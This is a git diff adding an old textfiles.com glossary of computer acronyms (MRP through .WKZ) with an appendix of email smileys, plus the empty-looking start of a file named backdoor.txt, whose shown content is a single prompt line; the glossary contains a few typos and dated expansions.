+MRP Materials Requirement Planning +MRPL Main Ring Path Length +MRT Mean Repair Time +MS Memory System + Message Store + Microsecond + + Microsoft Corporation + Millisecond +MSACM Mircrosoft Audio Compression Manager [Microsoft] +MSAV Microsoft Anti Virus +MSB Most Significant Bit +MSCDEX Microsoft CD Extensions [Microsoft] +MSD Mass Storage Device + Most Significant Digit +MS-DOS Microsoft - Disk Operating System [Microsoft] +MSDR Multiplexed Streaming Data Request +MSDS Microsoft Developer Support [Microsoft] +MSG Message +.MSG Program Message (file name extension) +MSI Medium Scale Integration +MSL Map Specification Library +.MSP Microsoft Paint (file name extension) [Microsoft] +MSW Machine Status Word +MTA Message Transfer Agent + Multiple Terminal Access +MTBB Mean Time Between Breakdowns +MTBF Mean Time Between Failures +MTBJ Mean Time Between Jams +MTF Microsoft Tape Format [Microsoft] + + Modulation Transfer Function +MTS Message Transfer Service/System + + Multichannel Television Sound +MTTF Mean Time To Failure +MTTR Mean Time To Repair +MUD Multiuser Domains [Internet] + + Multiuser Dungeons [Internet] +MUL Multiply +MUMPS Massachusetts General Hospital Utility + Multi-Programming System (Programming Language) +MUX Multiplexer +mV Millivolt +MVB Multimedia Viewer Book +MVC Multimedia Viewer Compiler +MVDM Multiple Virtual DOS Machines +MVGA Monochrome Video Graphics Array +MVS Multiple Virtual Storage +MVT Multiprogramming with a Variable number of Tasks +MX Mail Exchanger [Internet] +NACD National Association of Computer Dealers +NACS National Advisory Committee on Semiconductors +NAE Not Above or Equal +NAK Negative Acknowledgment +NAPLPS North American Presentation Level Protocol + Syntax (graphics) +NAS Network Application Support [DEC] +NASA National Aeronautics and Space Administration +NASI NetWare Asynchronous Services Interface [Novell] +NAU Network Addressable Unit +NBE Not Below or Equal +NBI Nothing But Initials +NBS National Bureau of Standards +NC No Carry + Numerical Control +NCA Network Communications Adapter +NCC Network Control Center +NCGA National Computer Graphics Association +NCIC National Crime Information Center +NCMT * Numerical Control for Machine Tools +NCP NetWare Core Protocol + Network Control Processor + + Network Control Program + Not Copy Protected +NCR National Cash Register (Company) +NCSI Network Communications Services Interface [Novell] +NDEF Not to be Defined +NDIS Network Driver Interface Specification +NDP Numeric Data Processor +NDRO Non-Destructive Read Out +NDS NetWare Directory Service [Novell] +.NDX Index (file name extension) +NEC Nippon Electric Company +NEG Negative + Negate +NET Network (organization Domain name) [Internet] +NetBIOS Network Basic Input/Output System [IBM] +NetBEUI NetBIOS Extended User Interface [IBM] +.NEW New Information (file name extension) +NEWS NetWare Early Warning System [Frye Computer] +NEXT Near-End Crosstalk +NFF No Fault Found +NFS Network File System +NG No Good +NGE Not Greater or Equal +NHC National Hurricane Center +N/I Non-Interlaced +NIC Network Information Center [Internet] + + Network Interface Card + + Numeric Intensive Computing +NICAD Nickel Cadmium +NID New Interactive Display [NEC] + Next ID +NIMH Nickel-Metal Hydride +NIPS Network I/Os Per Second +NISO National Information Standards Organization +NIST National Institute for Standards and Technology +NITC National Information Technology Center +NJE Network Job Entry (protocol) [IBM] +NL New Line +NLE Not Less or Equal +NLM NetWare Loadable Module [Netware] +NLQ Near Letter Quality +NLS National Language Support [OS/2] +NMI Non-Maskable Interrupt +NMM NetWare Management Map [NetWare] +NMOS Negative Channel Metal-Oxide Semiconductor +NMS Network Management System [Novell] +NNTP Network News Transfer Protocol [Internet] +NOC Network Operations Center +NOP No Operation +NOR Not Or +NOS Network Operating System +NPA Network Printer Alliance +NPI Network Printer Interface +NPL Nonprocedural Language +NPU Natural Processing Unit +NPX Numeric Processor Extension +NREN National Research and Education Network +NRZ Not Return to Zero +NRZI Non Return to Zero Inverted +NS Nanosecond + Network Supervisor + Non Stop +NSA POLY National Security Agency Polygraph +NSF National Science Foundation +NSTL National Software Testing Labs +NT New Technology [Microsoft] +NTF No Trouble Found +NTFS New Technology File System [Microsoft] +NTSC National Television Standards Committee +NUI Network User Identification + + Network User Interface + + Notebook User Interface [Go Corporation] +NUL Dummy Device + No Device +NV No Overflow +NVM Non-Volatile Memory +NVP Nominal Velocity of Propagation +NVRAM Non-Volatile Random Access Memory +OAB One-to-All Broadcast +OAG Official Airline Guide + Online Air Guide +OAI Open Applications Interface +OAS One-to-All Scatter +OBJ Object +OCE Open Collaborative Environment [Apple] +OCL Operation Control Language + Operator Control Language +OCR Optical Character Recognition +ODA Office Document Architecture +ODAPI Open Database Application Programming + Interface [Borlund] +ODBC Open Database Connectivity [Microsoft] +ODBMS Object-Oriented Database Management System (also + see OODMS) +ODI Open Datalink Interface [Novell] + + Open Device Interconnect [NetWare] +ODS Open Data Services [Microsoft] +OEM Original Equipment Manufacturer +OF Overflow Flag +OFMT Output Format for Numbers +OFS Output Field Separator +OH Off Hook +OIDL Object Interface Definition Language +OIS Office Information Systems +.OLD Old version (file name extension) +OLE Object Linking and Embedding [Microsoft] +OLI Optical Line Interface [AT&T] +OLMC Output Logic Macrocell +OLTP On-Line Transaction Processing +OM Object Manager +OMF Object Module Format [Microsoft] + + Open Message Format +OMG Object Management Group +OMI Open Messaging Interface [Lotus] +OMNS Open Network Management System +OMR Optical Mark Recognition +ONC Open Network Computing [Sun] +OODB Object-Oriented Database +OODMS Object-Oriented Database Management System (also + see ODBMS) +OOL Object-Oriented Language +OOPL Object-Oriented Programming Language +OOPS Object Oriented Programming and Systems +OOS Object-Oriented Systems + + Off-line Operating Simulator +OOUI Object Oriented User Interface +OP Operation + Optical + Output +OPAC Online Public Access Catlog [Internet] +OPC Optical Photoconductor +OPCODE Operational Code +OPD Operand +OPI Open Prepress Interface +OPM Operations Per Minute +OPS Operations +OPT Open Protocol Technology +.OPT Options (file name extension) +OPUS Octal Program Updating System +ORACLE On-Line Inquiry and Report Generator (UNIX DB program) +ORG Organization (organization Domain name) [Internet] +.ORI Original (file name extension) +ORS Output Record Separator +OS Operating System +OS/2 Operating System/2 [IBM] +OSA Open System Architecture +OS/E Operating System/Environment +OSF Open Software Foundation +OSI Open Systems Interconnection +OSM Off-Screen Model +OSP Optical Storage Processor +OSPF Open Shortest Path First +OSQL Object Structured Query Language +OT Object Technology +OTF Open Token Foundation +OTP One-Time Programmable +.OUT Outlines (file name extension) +OUTS Output String +OV Overflow +.OVL Program Overlay (file name extension) +.OVR Program Overlay (file name extension) +OWL Object Windows Library [Borlund] + + Open Windows Library [Borlund] +PABX Private Automatic Branch Exchange +PAD Packet Assembler/Disassembler +PADS Pen Application Development System [Slate Corporation] +.PAK Packed (file name extension) +PAL Paradox Applications Language [Borlund] + + Phase Alternate Line + Programmed Array Logic + + Programming Assembly Language +PALC Plasma-Addressed Liquid Crystal (display) +PALS Principles of the Alphabet Literacy System +PAP Passwork Authentication Protocol (protocol) +PAR Parallel +PARA Paragraph +PARC Palo Alto Research Center [XEROX] +.PAS PASCAL source code (file name extension) +PASCAL (Programming Language named for Blaise Pascal) +.PAT Patch (file name extension) +PBE Prompt By Example +PBX Private Branch Exchange +PC Personal Computer + Printed Circuit + Program Counter +PCB Printed Circuit Board + Program Control Block +PC-DOS Personal Computer - Disk Operating System [IBM] +PCI Peripheral Component Interconnect [Intel] +PC-I/O Program Controlled I/O +PCL Printer Command Language [HP] + Process Control Language +PCM Personal Computer Manufacturer + Pulse Code Modulation +PCMCIA Personal Computer Memory Card International Association +PCNFS Personal Computer Network File System +PCS Patchable Control Store + + Personal Communication Services + + Planning Control Sheet + Print Contrast Signal + + Process Control Systems + Program Counter Store + + Programmable Drive Table + Project Control System +.PCT Picture (file name extension) +.PCX Picture Image (file name extension) +PD Public Domain +PDA Personal Digital Assistant +PDD Physical Device Driver +PDF Portable Document Format + + Processor Defined Function + + Program Development Facility +.PDF Printer Description (file name extension)[Borlund,Lotus] +PDIAL Public Dialup Internet Access List [Internet] +PDL Page Description Language + Program Description Language + + Program Design Language +PDN Public Data Network +PDP Progammable Data Processor + + (DEC Computer System Designation, i.e. PDP-8, PDP-11) +PDS Packet Driver Specification + Partitioned Data Set +PDSS Post Development and Software Support +PDT Programmable Drive Table +.PDX Paradox files (file name extension) [Borlund] +PE Parity Even + Processing Element + Protect Enable +PEA Pocket Ethernet Adapter +PEL Picture Element [IBM] +PEN SDK Pen Computing Software Development Kit +PEP Packetized Ensemble Protocol [Telebit] +PERL Practical Extraction and Report Language [Unix] +PERT Program Evaluation and Review Technique +PES Positioning Error Signal + Processor Enhancement Socket + Processor Upgrade Socket +PET Print Enhancement Technology [Compaq] +.PFM Printer Font Metrics (file name extension) [Windows] +PFR Power-Fail Restart +PGA Pin Grid Array + Professional Graphics Adapter [IBM] +PGDN Page Down +.PGL Graphics (file name extension) [Hewlett-Packard] +PGM Program +.PGP ProGram Parameter (file name extension) [AutoCAD] +PGUP Page Up +PHIGS Programmers' Hierarchial Interactive Graphics + Standards +.PHO Phone List (file name extension) +PI Program Interruption +PIA Peripheral Interface Adapter +PIC Priority Interrupt Controller + + Program Interrupt Controller +PICT Picture +PID Process Identification Number +PIF Program Information File +PILOT Programmed Inquiry Learning Or Teaching +PIM Personal Information Manager +PIN Personal Identification Number +PING Packet Internet Groper +PIO Parallel Input/Output + Processor Input/Output + + Programmed Input/Output +PIP Picture In Picture + Problem Isolation Procedure + + Programmable Interconnect Point +PIPO Parallel In, Parallel Out +PIT Programmable Interval Timer +PIXEL Picture Element +PL Plus +PLA Programmable Logic-Array +PLATO Programmed Logic for Automatic Teaching Operations +PLC Programmable Logic Controller +PLCC Plastic Leadless Chip Carrier +PLD Programmable Logic Device +PLL Phase Locked Loop +.PLL Prelinked Library (file name extension) [Clipper] +PL/M Programming Language for Micros +PLV Production Level Video +PL/1 * Programming Language One +PM Presentation Manager [IBM] + + Preventative Maintenance + Process Manager +PMMU Paged Memory Management Unit +PMOS Positive Channel Metal Oxide Semiconductor +PMS Policy Management System +PN Processing Node +PO Parity Odd +POL Problem Oriented Language +POP Point Of Presence [MCI] + Pop from Stack + + Post Office Protocol +POPA Pop All Registers +POPF Pop Flags +POS Point Of Sale + Positive + Programmable Object Select +POSIX Portable Operating System Environment Standard [IEEE] +POST Power-On Self Test +POSTNET Postal Numeric Encoding Technique +PPDS Personal Printer Data Stream [IBM] +PPM Pages Per Minute +PPP Point-to-Point Protocol [Internet] +PRAM Parallel Random-Access Machine +.PRD Printer Driver (file name extension) [Word] +.PRF Preferences (file name extension) [Grammatik IV] +.PRG Program (file name extension) +PRMD Private Mangement Domain [X.400} +.PRO Profile (file name extension) +PROC Procedure +PROFS Professional Office System [IBM] +PROG Program + Programmer +PROLOG Programming In Logic (Programming Language)(See HLL) +PROM Programmable Read Only Memory +PRN Printer +PPP Point-to-Point Protocol +PRACSA Public Remote Access Computer Standards Association +PRAM Parameter Random Access Memory + + Programmable Random Access Memory +PRMD Private Management Domain +.PRS Printer (file name extension) [WordPerfect] +PRTSC Print Screen +PS Proportional Spacing +.PS PostScript (file name extension) +PS/2 Programming System 2 [IBM] +PSC Product Service Center +PSF Permanent Swap File +PSP Personal Software Products (group) [IBM] + + Program Segment Prefix +P-SRAM Pseudo-Static Random Access Memory +PSTN Public Switch Telephone Network +PSW Program Status Word +PT Page Table +P/T Part Time +PTD Parallel Transfer Disk Drive +PUB Public (directory) [Internet] + Publish +.PUB Publication (file name extension) [Ventura] +PUS Processor Upgrade Socket +PUSHA Push All Registers +PUSHF Push Flags +PVC Polyvinyl Chloride +PVM Parallel Virtual Machine + + Pass-through Virtual Machine (protocol) [IBM] +PWB Printed Wire Board + + Programmer's Workbench [Microsoft] +PWR Power +PWSCS Programmable Worstation Communication + Services [IBM] +.PX Primary Index (file name extension) [Paradox] +QA Quality Assurance +QAM Quadrature Amplitude Modulation +QBE Query By Example +QBF Query by Form +QC Quality Control +QDOS Quick and Dirty Operating System +.QDI Dictionary (file name extension) [Quicken] +.QDT Data (file name extension) [Quicken] +QFA Quick File Access +QIC Quality Information Using Cycle Time [Hewlett-Packard] + + Quarter-Inch Cartridge +.QIF Quicken Interchange Format (file name extension) +.QMT Memorized List (file name extension) [Quicken] +.QNX Indexes to Data (file name extension) [Quicken] +QPSK Quadrature Phase Shift Keying +RA Return Authorization +RACF Resource Access Control Facility +RAG Row Address Generator +RAID Redundant Arrays of Independent Disks + + Redundant Arrays of Independent Drives + + Redundant Arrays of Inexpensive Disks +RALU Register Arithmetic Logic Unit +RAM Random Access Memory +RAMDAC Random Access Memory Digital-to-Analog + Converter [Sierra] +RAND Random +RAP Rapid Application Prototyping +RARP Reverse Address Resolution Protocol +RAS Random Access Storage + + Reliability, Availability and Serviceability + + Row Address Select +RB Right Button (of 2 or 3 button Mouse) +RBBS Remote Bulletin Board System +RCL Rotate Carry Left +RCP Restore Cursor Position +RCR Rotate Carry Right +RCS Records Communications Switching System +RD Receive Data + Remove Directory +R&D Research and Development +RDA Remote Database Access +RDB Receive Data Buffer + Relational Database +RDBMS Relational Database Mangement System +RDCLK Received Timing Clock +RDSR Receiver Data Service Request +.REC Recorder (file name extension) +.REF Reference (file name extension) +REG Register +REGAL Rigid Epoxy Glass Acrylic Laminate +RELSECT Relative Sector +REM Remark + Remote + Ring Error Monitor +REN Rename +REP Repeat +REPE Repeat while Equal +REPNE Repeat while Not Equal +REPNZ Repeat while Not Zero +REPZ Repeat while Zero +REQ Request +RES Remote Execution Service + Reset + Resolution +.RES Resource (file name extension) +RET Resolution Enhancement Technology [HP] + + Return +REX Relocatable Executable +REXX Restructured Extended Executor (language) [IBM] +RF Radio Frequency +RFC Request For Comments [Internet] +RFI Radio Frequency Interference +RFP Request for Proposal +RFS Remote File System +RFT Revisable Form Text + Rich Text Format +RFU Reserved For Future Use +RGB Red-Green-Blue (color model) +RI Referential Integrity +RIFF Resource Interschange File Format [Microsoft] +RIM Remote Installation and Maintenance [Microsoft] +RIME RelayNet International Message Exchange +RIP Raster Image Processor + + Remote Imaging Protocol + + Routing Information Protocol [Novell] +RISC Reduced Instruction Set Computer +RJE Remote Job Entry +RLE Run Length Encoded +RLL Run Length Limited +RLN Remote LAN Node [DCA] +RLSD Received Line Signal Detected +RLSI * Ridiculously Large-Scale Integration +RM Reset Mode +RMA Return Material Authorization + + Return to Manufacturer Authorization +RMDIR Remove Directory +RMON Remote Monitor/Monitoring +RMS Record Management Services + Root Mean Square +RND Random +R-O Read Only +ROL Rotate Left +ROM Read Only Memory +ROR Rotate Right +RPC Real Procedure Call + Remote Procedure Call +RPG Report Program Generator (Programming Language) +RPL Resident Programming Language + + Requested Privilege Level +RPPROM Reprogrammable PROM +RPT Repeat +RPQ Request for Price Quotation +RQBE Relational Query By Example [Fox Pro] +RR Real Reality +RS Radio Shack + + Recommended Standard (as in RS-232) [EIA] + + Record Separator + Request to Send +RSCS Remote Spooling Communications System +RSL Request-and-Status Link +RSP Required Space Character +RST Reset + Restart +RSTS Resource Sharing Time Sharing [Digital] +RSX Real Time Resource Sharing Executive +RT Real Time + RISC Technology + Run Time +R/T Receive/Transmit +RTAM Remote Terminal Access Method +RTC Real-Time Clock +RTF Rich Text Format +RTL Register Transfer Language + + Resistor Transistor Logic + Right-To-Left + + Run Time Library +RTM Response Time Monitor +RTOS Real-Time Operating System +RTS Request To Send +RTTY Radio Teletypewriter (Communications) +RTV Real Time Video +R/W Read/Write +RWM Read-Write Memory +RX Receiver +RXD Received Data +SAA Systems Application Architecture [IBM] +SADL Synchronous Data Link Control [Racal-Vadic] +SAINT * Symbolic Automatic Integrator +SAL Shift Arithmetic Left +SAM Serial Access Memory + + Sequential Access Method +SAP Second Audio Program + Service Access + Point [DEC] + Service Advertising Protocol +SAP * Symbolic Assembly Program +SAR Shift Arithmetic Right + + Successive Approximation Register +SAS Sales Accounting System + Single Audio System +.SAV Saved (file name extension) +SAVDM Single Application VDM +SB Sound Board +SBB Subtract With Borrow +SBC Single-Board Computer +SBCS Single-Byte Character Set +SCAS Scan String +SCB Subsystem Control Block [IBM] +SCC Serial Communications Controllers + + Serial Controller Chip + + Synchronous Channel Check [IBM] +SCCS Source Code Control System +SCD Standard Color Display +SCF System Control Facility +SCM Software Configuration Management +SCO Santa Cruz Operation (Software Company) +SCOPE Simple Communications Programming Enironment + [Hayes] +SCP Save Cursor Position + Subsystem Control Port + + System Control Program +SCR Silicon Controlled Rectifier +.SCR Script (file name extension) +SCRN Screen (video display) +SCSI Small Computer Systems Interface +SD Send Data +SDA Software Disk Array + Source Data Automation + + System Display Architecture [Digital] +SDF Space Delimited File + Space Delimited Format +.SDF Standard Data Format (file name extension) +SDI Selective Dissemination of Information +SDK Software Developer's Kit [Microsoft] +SDLC Synchronous Data Link Control (protocol) +SDN Software Defined Network [AT&T] +SDNS Secure Data Network Service +SDR Streaming Data Request +SDS Sysops Distribution System +SD_STB Streaming Data Strobe [IBM] +SEA Standard Extended Attribute [OS/2] +SEAC * Name of first computer to use transistors, built + by Standard Eastern Automating Computing +SEC Single Error Correction +SECAM Sequential Color And Memory +SED Stream Editor +SEG Segment +SEL Select +SEM Scanning Electron Microscope + + Standard Electronic Module +SER Serial +SET Softwave Engineering Technology +.SET Driver Set (file name extension) [Lotus 1-2-3] [LDC] + + Image Settings (file name extension) [Paradox] +SEU Smallest Executable Unit +SF Sign Flag +SFQL Structured Full-text Query Language +SFT System Fault Tolerance +SFX Sound Effect(s) +SGEN Signal Generator + System Generator +SGDT Store Global Descriptor Table +SGML Standard Generalized Markup Language +SGR Set Graphics Rendition +S/H Sample and Hold +SHAR Shell Archive +SHL Shift Logical Left +SHR Shift Logical Right +SI Source Index + System Information +SID Station Identification [AT&T] + + Symbolic Interactive Debugger +SIDT Store Interrupt Descriptor Table +SIG Special Interest Group +SIGCAT Special Interest Group on CD-ROM Applications + and Technology +SIM Simulator +SIMD Single Instruction Multiple Data Stream (processor) +SIMM Single In-line Memory Module +SIMULA Simulation (language) +SIO Serial Input/Output (communications driver) +SIP Single In-line Package +SIPO Serial In, Parallel Out +SIPP Single In-line Pin Package +SIT Special Information Tones +SISO Serial In, Serial Out +SLDT Store Local Descriptor Table +SLIP Serial Line Interface Protocol +SLMR Silly Little Modem Reader +SLOSH Sea, Lake and Overland Surge from Hurricane (program) +SLSI Super Large-Scale Integration +SLSS Systems Library Subscription Service [IBM] +SM Set Mode + Shared Memory +SMB Server Message Block (protocol) [MII] +SMD Surface Mounted Device +SMDS Switched Multi-Megabit Data Service +SMF System Manager Facility [Compaq] +SMI System Management Interrupt [Intel] +SMIF Standard Mechanical Interface +SMIT System Management Interface Tool [IBM] +SMK Software Migration Kit [Microsoft] +SMM System Mangement Mode [Intel] +SMP Symbolic Manipulation Program + + Symmetrical Multiprocessor +SMPC Shared Memory Parallel Computer +SMPS Switching Mode Power Supply +SMRAM System Management Random Access Memory +SMS Storage Management Services [NetWare] + + Storage Management Subsystem +SMSW Store Machine Status Word +SMT Surface-Mount Technology +SMTP Simple Mail Transfer Protocol +SMU System Management Utility +SN Serial Number +S/N Signal-to-Noise (Ratio) +SNA Systems Network Architecture [IBM] +SND Sound +SNMP Simple Network Management Protocol +SNOBOL String Oriented Symbolic Language (Progamming Language) +SNP Serial Number/Password [Omen Technology] +SNR Signal-to-Noise Ratio +SOC System On a Chip +SOE Standard Operating Environment +SOH Start of Heading +SOL Simulation Oriented Language +SOM Start of Message + System Object Model [IBM] +SONET Synchronous Optical Network +SOP Standard Operating Procedures +SOS Silicon On Sapphire + Standards and Open Systems +SOTA State Of The Art +SOX Sound Exchange +SP Service Pack [IBM] + Stack Pointer + System Product +SPA Software Publishers Association +SPARC Scalable Processor Architecture +SPC Small Peripheral Controller + Statistical Process Control +SPCL Spectrum Cellular Corporation +SPF Shortest Path First + System Programming Facility +SPI Service Provider Interface +SPIKE Science Planning Intelligent Knowledge-Based + Environment [STScI] +SPL Spooler +.SPL Spell Checker (file name extension) +SPM System Performance Monitor [IBM] +SPOOL Simultaneous Peripheral Operations On Line +SPS Standby Power System +SPSS Statistical Package for the Social Sciences +SPT Sectors Per Track +SPX Sequenced Packet Exchange [Novell] +SQ Squeezed (files) +SQL/DS Structured Query Language/Data System [IBM] +SQRT Square Root +SR Shift Register +SRAM Shadow Random Access Memory + + Static Random Access Memory +SRD Screen Reader System +SRM Security Reference Monitor +SRO Sharable and Read Only +SRPI Server-Requester Programming Interface +SRQ Service Request +SRR Serially Reusable Resource +SS Stack Segment + Single Sided + Seconds +SSEC * Selective Sequence Electronic Calculator [IBM] +SSGA System Suppport Gate Array +SSI Small Scale Integration +SST Spread-Spectrum Technology +STA Spanning Tree Algorithm +STB Strobe +STC Set Carry Flag +STD Set Direction Flag + Standard +STDA StreetTalk Directory Assistance [Banyan] +STDAUX Standard Auxillary +STDERR Standard Error +STDIN Standard Input +STDIO.H Standard Input/Output Header [C] +STDM Statistical Time Division Multiplexer +STDOUT Standard Output +STDPRN Standard Printer +.STF Structured File (file name extension) [Lotus Agenda] +STI Set Interrupt Flag +STN Supertwist Nematic +STOS Store String +STP Shielded Twisted Pair (cable) + Signal Transfer Point +STR Store Task Register + Synchronous Transmitter Receiver +STRESS Structural Engineering System Solver (Programming + Language) +STRUDL Structural Design Language (Programming Language) +STScI Space Telescope Science Institute +STX Start of Text +.STY Style (file name extension) [Ventura, Word, WordPerfect] +SUB Subroutine + Substitute + Subtract +.SUP Supplemental Dictionary (file name extension) + [WordPerfect] +SVGA Super Video Graphics Array +S-VHS Super VHS +S/W Software +.SWP Swap (file name extension) +SYLK Symbolic Link +.SYM Symbols (file name extension) +.SYN Synonym (file name extension) +SYNC Synchronous +SYS System +.SYS System Configuration (file name extension) + + System Device Driver (file name extension) +SYSGEN System Generator +SYSLOG System Log +SYSMOD System Modification +SYSOP System Operator +SYSREQ System Request +TAD Telephone Answering Device +TAPCIS The Access Program for the CompuServe + Information Service +TAR Tape Archive +TASM Turbo Assembler [Borland] +TAXI Transparent Asynchronous Tranceiver Interface +TB Terabyte (1,000 gigabytes) +T/B Top and Bottom +TBBS The Bread Board System (BBS) +.TBK Toolbook (file name extension) +TC Test Control + Transmission Control +TCM Trellis-Coded Modulation +TCP/IP Transmission Control Protocol/Internet Protocol +TD Transmit Data +TDtoDP Tablet Coordinates to Display Coordinates + (converting) +TDE Terminal Display Editor +.TDF Trace Definition File (file name extension) [OS/2] + + Typeface Definition File (file name extension) +TDM Time Division Multiplexing +TDMA Time Division Multiple Access +TDMS Terminal Display Management System +TDSR Transmitter Data Service Request +TDR Time Domain Reflectometry +TE/2 Terminal Emulator/2 [Oberon] +TEC Tokyo Electronics Corporation +TED Tiny Editor +TEML Turbo Editor Macro Language [Borlund] +TER Thermal Eclipse Reading [Sony] +TERMPWR Terminator Power +TFDD Text File Device Driver +TFEL Thin-Film Electroluminescent +.TFM Tagged Font Metric (file name extension) +TFT Thin-Film Transistor (screens) +THD Total Harmonic Distortion +.THD Thread (file name extension) +THOR Tandy High-Performance Optical Recording +.THS Thesaurus (file name extension) +TI Texas Instruments, Inc. +TID Target ID +TIES Time Independent Escape Sequence +.TIF Tagged Image File (filename extension) +TIFF Tagged Image File Format +TIGA Texas Instruments Graphics Architecture +TIGER Topologically Integrated Geographic Encoding + and Referencing +TIP Terminal Interface Processor +TLB Translation Lookaside Buffer +TLI Transport Layer Interface +TLU Table Lookup +.TLX Telex (file name extension) +TM Trademark +TMP Temporary +TN Twisted Nematic +TNC Terminal Node Controller +TOP Technical and Office Protocol +TPC Transaction Processing Performance Council +TPI Tracks Per Inch +TPL Table Producing Language +TPM Transactions Per Minute +TPORT Twisted Pair Port Transceiver [AT&T] +TPS Transactions Per Second + + Transaction Processing System +TPW Turbo Pascal for Windows +TQM Total Quality Management +TR Terminal Ready +T/R Transmit/Receive +TRADIC * Transistorized Airborne Digital Computer + (Name of first computer to be entirely + transistorized) +.TRM Terminal (file name extension) +TRON The Real-Time Operating System Nucleus +TS Top Secret +TSA Technical Support Alliance +TSB Termination Status Block +TSO Time Sharing Option +TSR Terminate and Stay Resident +TSS Task State Segment + Time Sharing System +TS/SI Top Secret/Sensitive Information +.TST Test (file name extension) +TSTN Triple Supertwisted Nematic +.TTF TrueType Font (file name extension) +TTL Transistor-Transistor Logic +TTS Transaction Tracking System +TTY Teletype +TUI Text-Based User Interface [WordPerfect] +.TUT Tutorial (file name extension) +TVI Television Interference +TWX Teletypewriter Exchange Service +TXD Transmitted Data +TXT Text +TXT2STF Text To Structured File [Lotus Agenda] +UA User Agent + User Area +UAE Unrecoverable Application Error +UART Universal Asynchronous Receiver/Transmitter +UCL Universal Communications Language +UCS Universal Character Set +UDC User Defined Commands +UDE Universal Data Exchange +UDF User Defined Functions +UDP User Datagram Protocol +UFS Unix File System +UG User Group +UI Unix International + User Interface +UID User Identifier +UL Underwriters Laboratories + Upload +ULA Uncommitted Logic Array +ULN Universal Link Negotiation +ULSI Ultra Large Scale Integration +UMB Upper Memory Block [LIM/AST] +UNC Universal Naming Convention +UNCOL Universal Computed Oriented Language +UNICOM Universal Integrated Communication (System) +UNICOS Universal Compiler FORTRAN compatible +UNIVAC Universal Automatic Computer +UNIX (AT&T Bell Laboratories Operating System) +UNMA Unified Network Management Architecture +UPC Universal Product Code +UPL User Program Language +UPM Unix Programmer's Manual + + User Profile Management [IBM] +UPS Uninterruptible Power Supply + + Uninterruptible Power System +UREP Unix RSCS Emulation Protocol (protocol) +US Unit Separator +USART Universal Synchronous-Asynchronous Reciever/Transmitter +USERID User Identification +USQ Unsqueezed (files) +USR US Robotics (corporation) +USRT Universal Synchronous Receiver/Transmitter +USSA User Supported Software Association (United Kingdom) +UT User Terminal +UTC Coordinated Universal Time +UTI Universal Text Interchange +UTP Unshielded Twisted-Pair (cable) +UU Uuencode/Uudecode +UUCP Unix-To-Unix Copy Program +UUI User-To-User Information [AT&T] +UV Ultraviolet +VA Virtual Address +VAD Value Added Dealer +VADD Value Added Disk Driver +VAL Value + Voice Application Language +.VAL Validity Checks (file name extension) [Paradox] +VAM Virtual Access Method +VAN Value Added Network +VAP Value Added Processes +VAR Value Added Reseller + Value Added Retailer + Variable +VAX/VMS Virtual Address Extension/Virtual Memory System [DEC] +VB Variable Block +VBA Visual Basic for Applications [Microsoft] +.VBX Visual Basic (file name extension) +VCD Virtual Communications Driver +VCPI Virtual Control Program Interface +VCR Video Cassette Recorder +VDD Virtual Device Driver +VDDM Virtual Device Driver Manager +VDE Video Display Editor +VDISK Virtual Disk +VDM Virtual DOS Machine [IBM] +VDS Virtual DMA Services +VDT Video Display Terminal +VDU Video Display Unit + Visual Display Unit +VEGA Video-7 Enhanced Graphics Adapter [Video-7, Inc.] +VEMM Virtual Expanded Memory Manager +VER Verify +VERONICA Very Easy Rodent-Oriented Network Index to + Computer Archives [Internet] +VERR Verify Read Access +VERW Verify Write Access +VESA Video Electronics Standards Association +VFD Vacuum Fluorescent Display +VGA Video Graphics Array +VGC Video Graphics Controller +VHS Very High Speed + Virtual Host Storage +VHSIC Very High Speed Integrated Circuit +VIM Vendor Independent Messaging (interface) +VIO Video Input/Output + Virtual Input/Output +VINES Virtual Network Operating System [Banyan] +VIP Variable Information Processing +VIPER Verifiable Integrated Processor for + Enhanced Reliability +VIS Video Information System [Tandy] + + Voice Information System +VL-BUS Vesa Local-Bus [VESA] +VLF Very Low Frequency +VLIW Very Long Instruction Word (machine) +VLM Virtual Loadable Module +VLSI Very Large Scale Integration +VLSIPS Very Large Scale Immobilized Polymer Synthesis +VLT Variable List Table +VM Virtual Machine + Virtual Memory +VMA Virtual Memory Address +VMB Virtual Machine Boot +VMM Virtual Memory Manager +VMOS Vertical MOS +VMS Virtual Memory System + Voice Message System +VMT Virtual Memory Technique +VOL Volume +VOM Volt Ohm Meter +VOS Verbal Operating System +VPD Virtual Printer Device +VPDS Virtual Private Data Service [MCI] +VR Virtual Reality + Voltage Regulator +VRAM Video Random Access Memory +VROOMM Virtual Real-time Object Oriented + Memory Manager [Borlund] +.VRS WordPerfect Graphics Driver (file name extension) +VRU Voice Response Unit +VS Virtual Storage +VSAM Virtual Storage Access Method +VSAT Very Small Aperture Terminal +VSE Virtual Storage Extended +VSF Vertical Scanning Frequency +VSLI Very Large Scale Integration +VSM Virtual Shared Memory + Virtual Storage Management +VSOS Virtual Storage Operating System +VSYNC Vertical Sync +VTAM Virtual Telecommunications Access Method [IBM] +VUI Video User Interface +VUP VAX Unit of Performance +VMS Virtual Memory System + Voice Message System +VWB Visual WorkBench [Microsoft] +W/ With +W3 (see WWW) +WABI Windows Application Binary Interface [Sun] +WAIS Wide Area Information Server/Service +WAITS Wide Area Information Transfer System +WAN Wide Area Network +WATS Wide Area Telecommunications Service +.WAV Waveform Audio (file name extension) +WC Word Count +WELL Whole Earth Lectronic Link (BBS) +WFW Windows For Workgroups [Microsoft] +WGS Work Group System +WINForum Wireless Information Networks Forum +WINWORD Word For Windows [Microsoft] +WISE WordPerfect Information System Environment +.WKB Workbook (file name extension) [WordPerfect] +.WKE Worksheet (file name extension) [Lotus 1-2-3] [LDC] +.WKQ Spreadsheet (file name extension) [BORQU] +.WKS Worksheet (file name extension) [Lotus 1-2-3] [LDC] +.WKZ Compressed Spreadsheet (file name extension) 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If received during Dec, your + disk will be held until the Jan version is issued. + + +Note 2: Any of these disk sizes may be sent for updates: + + 5-1/4" DD or HD 3-1/2" DD or HD + + +APPENDIX B: + + In electronic mail, some of the following "smiley faces" +rather than words, are used to express the writer's feelings. +Turn your head to the side to read them. + + :-) Smile :-D Laughing + + :) Smile :-} Grin + + :-] Smirk :-( Frown + + ;-) Wink :-X Close-mouthed + + 8-) Wide-eyed :-O Open-mouthed + + :-|) I wear a :-Q But I don't inhale + moustache + :-o Oh, no! + + + Also used: Grin + + Wide Grin + + Very wide grin + diff --git a/textfiles.com/computers/backdoor.txt b/textfiles.com/computers/backdoor.txt new file mode 100644 index 00000000..577d89e0 --- /dev/null +++ b/textfiles.com/computers/backdoor.txt @@ -0,0 +1,353 @@ + + +What is the Filename to read? 